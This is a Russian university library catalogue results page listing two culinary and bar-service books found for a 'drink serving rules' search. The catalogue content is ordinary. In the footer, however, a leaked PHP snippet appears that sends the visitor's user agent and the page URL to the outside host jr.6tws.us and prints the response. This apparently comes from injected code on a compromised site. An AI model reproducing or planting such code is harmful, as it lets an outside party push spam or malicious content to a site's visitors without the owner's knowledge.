Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

53 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРАВИЛА подачи напитков")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 2
1. 
Ермакова В. И. Официант, бармен [Текст] / В. И. Ермакова, 2012. - 271 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- УСЛУГИ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- ПОМЕЩЕНИЕ ПРОИЗВОДСТВЕННОЕ -- ПОМЕЩЕНИЕ СКЛАДСКОЕ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- ПОМЕЩЕНИЕ ДЛЯ НАРЕЗАНИЯ ХЛЕБА -- ОРГАНИЗАЦИЯ РАЗДАТОЧНОЙ РАБОТЫ -- СЕРВИС - БАР -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- ОБОРУДОВАНИЕ ОБЕДЕННОГО ЗАЛА -- ЗАЛ ОБЕДЕННЫЙ -- ОБОРУДОВАНИЕ БАНКЕТНОГО ЗАЛА -- ЗАЛ БАНКЕТНЫЙ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА КЕРАМИЧЕСКАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА МЕТАЛЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- МЕНЮ -- КАРТА ВИН -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ЗАКАЗ БЛЮД -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ КОМБИНИРОВАННЫЙ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - ГОСТИНИЦА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - КОНФЕРЕНЦИЯ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - СВАДЬБА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - НОВЫЙ ГОД -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ НА ДОМУ -- БАР -- ПОСУДА БАРНАЯ -- ИНВЕНТАРЬ БАРА -- БАРМЕН -- БАР - МУЗЫКА -- РАЗЛИВ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ ТАБАЧНЫХ ИЗДЕЛИЙ -- КОКТЕЙЛЬ -- ТЕХНОЛОГИЯ ПРИГОТОВЛЕНИЯ КОКТЕЙЛЕЙ -- НАПИТКИ -- ОФИЦИАНТ -- БАРМЕН -- ХАРАКТЕРИСТИКА КВАЛИФИКАЦИОННАЯ -- ОХРАНА ТРУДА
Держатели документа (Информация об экземплярах) 
2. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.60 с.12 запросов, 0.39c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;